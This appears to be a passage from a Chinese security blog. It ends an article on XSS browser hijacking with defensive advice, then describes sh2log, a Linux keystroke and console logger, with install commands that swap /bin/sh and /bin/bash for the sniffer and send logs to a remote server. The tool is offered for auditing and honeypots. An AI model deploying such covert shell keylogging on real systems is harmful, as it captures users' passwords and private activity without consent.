以往大家都以为XSS漏洞只能对特定页面造成影响，经过我的分析大家应该了解到XSS漏洞的影响应该是整站范围的。以后的WEB x.0网站开始大量使用AJAX技术，浏览页面几乎是不刷新的，所以利用XSS漏洞劫持浏览器这种攻击方式将是致命的。另外可以看到的是，XSS已经不是传统意义上的劫持会话进行攻击，而是劫持用户的整个浏览器。建议各大网站和程序开发者，谨慎对待每一个可能出现安全问题的细节，多检查程序中的输入输出，尽量避免XSS漏洞。对于用户可以考虑使用Firefox浏览器的noscript插件，从客户端防住XSS攻击。
最后感谢HI群的朋友们给我提供的资料，同时欢迎各位朋友到80SEC来进行技术交流。

linux键盘记录之sh2log介绍

2008-06-28T18:04:23+08:00

sh2log description Download

sh2log is a PTY sniffing program that captures all keystrokes and console output of physical and virtual consoles. sh2log works in userland and does not require the installation of a kernel module.

Consequently, it can be run on a wide range of different UNIX platforms. It provides ready-to-use log files and is meant to be used for legitimate purposes such as auditing user actions on a sensitive server or a honeypot.

How to install it

2.1. Edit config.h and setup the following values:

CONNECT_IP IP address of the machine on which sh2logd runs
SERVER_PORT UDP port in use by sh2logd
REAL_SHELL_DIR Directory for the real shells (/bin/shells)
MAX_LOG_SIZE Maximum size before a new log file is created
secret This is a 128-bit symmetric key used to secure
the data when transmitted over the network.

2.2. Compile sh2log by simply running "make system"

System can be any of those: linux, freebsd, openbsd, cygwin, sunos, aix, irix, hpux and osf.

2.3. Replace the original shell with sh2log and run sh2logd:

# mkdir /bin/shells/
# cp -p /bin/{sh,bash} /bin/shells/
# rm -f /bin/{sh,bash}
# cp -p sh2log /bin/bash
# cp -p sh2log /bin/sh
# ./sh2logd

If you see an error message about "bash: text file busy", check that you have rm'ed the file before copying sh2log over it. Also, I'd recommended not running sh2log and sh2logd on the same machine.

Warning: /bin/sh is often a symlink to /bin/bash. DO NOT FORGET TO Create "/bin/shells/sh" or YOUR SYSTEM WILL BE UNUSABLE!

3. Monitoring your users: the interactive log parser

Please try first to run ./parser with the provided sh2log example file "test.bin". Window resizing requires XTerm (not rxvt, eterm or konsole) and a valid DISPLAY; or if you use PuTTY, try resizing the window by hand.

The parser provides both non-interactive and interactive (takedown-like) modes of operation. In interactive mode, you can pause, fast forward (2x or 4x) and also follow in real time what the users are doing one the system, and have a live view of all terminals.